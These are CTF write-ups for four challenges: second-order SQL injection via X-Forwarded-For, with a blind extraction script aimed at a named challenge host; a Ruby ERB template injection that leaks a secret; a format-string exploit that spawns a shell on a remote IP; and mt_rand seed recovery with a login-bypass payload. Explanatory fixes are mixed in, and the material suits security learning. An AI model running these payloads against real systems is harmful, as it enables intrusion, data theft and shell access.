## [RoarCTF 2019] Online Proxy

Key point: second-order SQL injection through the X-Forwarded-For (XFF) header

PoC (the first line is sent as the X-Forwarded-For value, followed by two requests carrying a harmless value):

```
0' or 1 or '0
111
111
```

Result is 1.

```
0' or 0 or '0
111
111
```

Result is 0.


https://www.jianshu.com/p/08aabdbc8a7b
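The second-order flow the PoC above depends on, as an added example that is not part of the writeup or of the challenge: a constructed SQLite-backed stand-in with a visit log, where the X-Forwarded-For value is stored with a bound parameter on the first request (so it looks harmless) and is then trusted when read back for a later query. The `visits` table, the "seen before" check and the `Last Ip:` rendering are assumptions made for the example; the two payloads are the ones from the PoC.

```python
import sqlite3

# Constructed stand-in for the challenge's visit log (the real schema is not on the page).
LEGIT_IP = "10.0.0.1"  # an earlier, harmless visitor (constructed)


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, ip TEXT)")
    db.execute("INSERT INTO visits (ip) VALUES (?)", (LEGIT_IP,))
    return db


def store_visit(db, xff):
    """First order: the X-Forwarded-For value is written with a bound parameter,
    so a quote in it raises no error and nothing looks wrong at this point."""
    db.execute("INSERT INTO visits (ip) VALUES (?)", (xff,))
    return db.execute("SELECT max(id) FROM visits").fetchone()[0]


def seen_before_vulnerable(db, visit_id):
    """Second order: the stored value is read back and, being 'our own data',
    spliced into SQL text. This is where 0' or 1 or '0 takes effect."""
    (stored,) = db.execute("SELECT ip FROM visits WHERE id = ?", (visit_id,)).fetchone()
    sql = ("SELECT EXISTS(SELECT 1 FROM visits WHERE ip = '" + stored +
           "' AND id < " + str(visit_id) + ")")
    return db.execute(sql).fetchone()[0]


def seen_before_fixed(db, visit_id):
    """Same check with the stored value bound as a parameter on the second hop too:
    data read from the database is still input as far as the next query is concerned."""
    (stored,) = db.execute("SELECT ip FROM visits WHERE id = ?", (visit_id,)).fetchone()
    return db.execute(
        "SELECT EXISTS(SELECT 1 FROM visits WHERE ip = ? AND id < ?)",
        (stored, visit_id)).fetchone()[0]


def render(check, xff):
    """Drive both hops for one client and return the line the blind script keys on."""
    db = fresh_db()
    visit_id = store_visit(db, xff)
    return "Last Ip: %d" % check(db, visit_id)
```

Because the check yields 1 or 0, any condition in the stored value (the writeup's `ascii(substr(...)) > N`) becomes a yes/no oracle in the vulnerable version, which is exactly what the extraction script below binary-searches on; in the fixed version the attacker's string is compared as a literal and the answer no longer depends on it.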

```python
# coding:utf-8
import requests
import time

url = 'http://node4.buuoj.cn:25902/'

# Cookie values captured from the browser session. The original script sent them in the
# header dict together with X-Forwarded-For; that is kept, the server ignores them.
COOKIES = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924",
           "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f",
           "track_uuid": "bad65c37-76b0-4e9f-9145-7e33ee6a045e"}


def visit(xff):
    """One request with the given X-Forwarded-For value; on 429 wait and resend,
    so the comparison below never runs against a rate-limit body."""
    headers = dict(COOKIES, **{'X-Forwarded-For': xff})
    while True:
        r = requests.post(url=url, headers=headers)
        if r.status_code != 429:
            return r
        print('too fast')
        time.sleep(2)


res = ''
for i in range(1, 200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left) >> 1)
    while left < right:
        # Earlier stages, kept from the original: databases, then tables, then columns.
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i, mid)

        # The payload is stored as this client's IP; two follow-up requests with a
        # harmless value are needed before the evaluated result shows up in the page.
        r = visit(payload)
        print(r.text)
        r = visit('111')
        print(r.text)
        r = visit('111')
        print(r.text)

        if 'Last Ip: 1' in r.text:
            left = mid + 1
        else:
            right = mid
        mid = left + ((right - left) >> 1)
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid), res)
    time.sleep(1)

# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn
```

## [SCTF2019] Flag Shop

Key point: Ruby SSTI

The backend is written in Ruby.

How to run Ruby code:

1. `ruby -e`
2. type `irb` on the command line
3. from a file


The code is readable enough. Request parameters go straight into the output: SSTI.

This needs a Ruby feature: `$'` returns the part of the string to the right of the last regex match. For example:

```ruby
>> "There were once ten tin robots standing in a row." =~ /robot/
# regex match on "robot"; the result is the match position
=> 24
>> $'
=> "s standing in a row."
# the right-hand part after the match is returned
=> "ro"
=> nil
```

In the challenge, when the SECRET parameter is empty, the regex match on ENV["SECRET"] effectively matches the secret against itself, so `$'` yields it.

Payload:

```
/work?SECRET=&name=<%=$'%>&do=<%=$'%> is working
/work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20%69%73%20%77%6f%72%6b%69%6e%67
```

Response:

```json
{
  "uid": "c645dd09-6653-4e11-9066-e6b970a35866",
  "jkl": 1e+77
}
```

## PWN

### string

Key point: format string vulnerability


Honestly I don't quite understand why landing here gives a shell directly:

```c
((void (__fastcall *)(_QWORD, void *))v1)(0LL, v1);
```

Let's first understand the flow.

First, v4 is v3, and v3's address is given at the start:

```
secret[0] is 19da260
secret[1] is 19da264
```

There are three functions. sub_400BB9 contains a format string vulnerability.

So the vulnerability is used to rewrite v3[0]:

```c
v3[0] = v3[1]
```

Input `AAAA,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x`

or `AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p`

PoC:

```
upload
east
1
AAAA,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
AAAA,e92e47e3,e92e58c0,e9008264,c,0,e92e02a0,0,41414141,252c7825,2c78252c,78252c78,252c7825,78252cI
```

This shows the offset is 8.
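How the 8 is read off the leak above, as an added example that is not from the writeup: instead of eyeballing `41414141`, it matches the leaked `%x` values against the bytes of the format string itself, assuming an x86-64 layout in which printf consumes 8-byte stack slots and `%x` prints the low 32 bits of each (the values after `41414141` in the session are consistent with that). The leak line and the format string are the ones from the session; `dollar_write` mirrors the `%85c%7$n` used in the exploit. The root cause being demonstrated is user input passed as the format argument; the fix on the program side is a fixed format string with the input as an argument.

```python
import re

# Copied from the session above: "AAAA" followed by the values of thirteen %x
# conversions (the program cut the last one off).
FMT = "AAAA," + ",".join(["%x"] * 13)
LEAK_LINE = ("AAAA,e92e47e3,e92e58c0,e9008264,c,0,e92e02a0,0,41414141,"
             "252c7825,2c78252c,78252c78,252c7825,78252cI")


def leaked_values(line):
    """Split the echoed output into the conversion results, dropping the echoed
    marker and any %p-style 0x prefix so both payload variants above parse."""
    tokens = re.split(r"[,-]", line.strip())[1:]
    return [t[2:] if t.lower().startswith("0x") else t.lower() for t in tokens]


def buffer_image(fmt, slot=8, width=4):
    """Expected %x output for each stack slot holding the format string: the
    buffer sits on the stack, printf advances `slot` bytes per argument (8 on
    x86-64, an assumption) and %x prints the low `width` bytes little-endian."""
    raw = fmt.encode()
    return [format(int.from_bytes(raw[off:off + width], "little"), "x")
            for off in range(0, len(raw) - width + 1, slot)]


def find_buffer_offset(line, fmt):
    """1-based index of the first %x that reads the buffer itself, confirmed by
    checking that the conversions after it match the rest of the buffer too
    (a lone 41414141 could be a coincidence; a run of matches is not)."""
    values = leaked_values(line)
    image = buffer_image(fmt)
    for i in range(len(values)):
        window = values[i:i + len(image)]
        n = min(len(window), len(image))
        if n >= 2 and window[:n] == image[:n]:
            return i + 1
    return None


def dollar_write(value, argno):
    """%{value}c emits exactly `value` bytes, so the %n after it stores `value`
    through the pointer found in argument `argno`; %85c%7$n is the exploit's
    write of 85 via argument 7."""
    return "%{}c%{}$n".format(value, argno)
```

Run `find_buffer_offset(LEAK_LINE, FMT)` to get 8; the slot just before it (argument 7) is the one the exploit writes through, which is the v2 variable the writeup ends up using.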

What I had in mind for this challenge was: offset 8, so put v3's address directly into format and then use offset 8 to overwrite it. But in the end that didn't work.

It only works by assigning the address to v2, the variable right before format, and then using offset 7. I'm a bit dizzy; I don't know why my approach doesn't work.

The reference approach is clear too: overwrite v2, which sits right before format, so offset 7 is enough. 🙄🙄🙄

Done. I don't know where my approach went wrong. Too weak, sob.

Exploit:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/8/4 17:19
# @Author : upload
# @File : string.py
# @Software: PyCharm

from pwn import *

context(os="linux", arch="amd64", log_level="debug")
content = 2  # 1 = local binary, anything else = remote


def main():
    try:
        if content == 1:
            upload = process("string")
        else:
            upload = remote("111.200.241.244", 52607)
    except Exception:
        print("[!] Content error~")
        return

    # The program prints the address of secret[0] (v3) at start-up.
    upload.recvuntil("secret[0] is ")
    addr = int(upload.recvuntil("\n"), 16)
    print("addr", addr)

    # First idea (did not work): put the address into the format string itself and
    # write through argument 8:  str(addr) + 'a' * 77 + '%8$n'  (8 + 77 = 85 bytes).
    # Working payload: %85c prints 85 bytes, then %7$n stores 85 through the pointer
    # in argument 7, which is v2, the variable holding the address entered below.
    payload = "%85c%7$n"
    print(payload)
    upload.sendlineafter("What should your character's name be:\n", "upload")
    upload.sendlineafter("So, where you will go?east or up?:\n", "east")
    upload.sendlineafter("go into there(1), or leave(0)?:\n", "1")
    upload.sendlineafter("'Give me an address'\n", str(addr))
    upload.sendlineafter("And, you wish is:\n", payload)
    payload1 = asm(shellcraft.sh())
    upload.sendlineafter("Wizard: I will help you! USE YOU SPELL\n", payload1)

    upload.interactive()


main()
```

## [MRCTF2020] Ezaudit

Key point: mt_rand pseudo-random numbers

```
username=crispr&password=1'/**/||/**/1/**/||/**/'&Private_key=XuNhoueCDCGc&login=%E7%99%BB%E5%BD%95
```

Brute-forcing the seed:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/8/4 23:37
# @Author : upload
# @File : [MRCTF2020]Ezaudit.py
# @Software: PyCharm

# Alphabet used by the site's key generator, and the leaked public key.
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2 = 'KVQP0LdJKRaV3n9D'

# Each key character is the result of one mt_rand(0, 61) call; emit them as
# "value value 0 61" quadruples, the constraint format php_mt_seed takes.
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)

# Sanity check: every fourth element of the quadruples above maps back to the key.
a = [36,36,0,61,47,47,0,61,42,42,0,61,41,41,0,61,52,52,0,61,37,37,0,61,3,3,0,61,35,35,0,61,36,36,0,61,43,43,0,61,0,0,0,61,47,47,0,61,55,55,0,61,13,13,0,61,61,61,0,61,29,29,0,61]
key = ''
for i in a[::4]:
    key += str1[i]
print(key)  # reconstructs KVQP0LdJKRaV3n9D
```

Then run the tool to recover the seed.

PoC

PHP 5 environment:

```php
<?php
mt_srand(1775196155);
// public key
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}

// generate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
echo public_key();
echo ' ';
echo private_key();
?>
```
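Why the public key gives away the private key, as an added example that is not part of the writeup or the challenge: both keys are drawn from one seeded Mersenne Twister stream, so the 16 public characters pin down the seed and the seed reproduces the private key. The example uses Python's `random.Random`, whose seeding and range scaling differ from PHP's `mt_srand`/`mt_rand`, so its strings are not PHP's for the same seed (php_mt_seed is the tool for that); the structure is the same. The seed range searched is deliberately small and constructed; the real space is 2^32. `keys_secure` is the fix: an OS CSPRNG with no seed to recover.

```python
import random
import secrets
import string

# Same 62-character alphabet as the PHP generator.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits


def keys_from_seed(seed, pub_len=16, priv_len=12):
    """Mirror of the PHP code: one mt_srand, then a 16-char and a 12-char key
    from consecutive outputs. Python's MT seeding differs from PHP's
    (assumption made explicit here), so the values are illustrative only."""
    rng = random.Random(seed)
    public = "".join(rng.choice(ALPHABET) for _ in range(pub_len))
    private = "".join(rng.choice(ALPHABET) for _ in range(priv_len))
    return public, private


def recover_seed(public_key, seed_range):
    """Find the seed whose first len(public_key) outputs spell the public key.
    With a 32-bit seed this is a fixed-cost search, which is the whole weakness."""
    for seed in seed_range:
        if keys_from_seed(seed, pub_len=len(public_key))[0] == public_key:
            return seed
    return None


def private_from_public(public_key, seed_range):
    """What a leaked public key is worth to an attacker: the private key that
    the same seed produces next."""
    seed = recover_seed(public_key, seed_range)
    if seed is None:
        return None
    return keys_from_seed(seed, pub_len=len(public_key))[1]


def keys_secure(pub_len=16, priv_len=12):
    """Fix: draw both keys from the OS CSPRNG. There is no seed, and knowing
    the public key says nothing about the private one."""
    return ("".join(secrets.choice(ALPHABET) for _ in range(pub_len)),
            "".join(secrets.choice(ALPHABET) for _ in range(priv_len)))
```

For PHP the equivalent of `keys_secure` is `random_int(0, 61)` in place of `mt_rand(0, 61)`; `mt_srand` with a fixed or time-derived seed should never feed anything that has to stay secret.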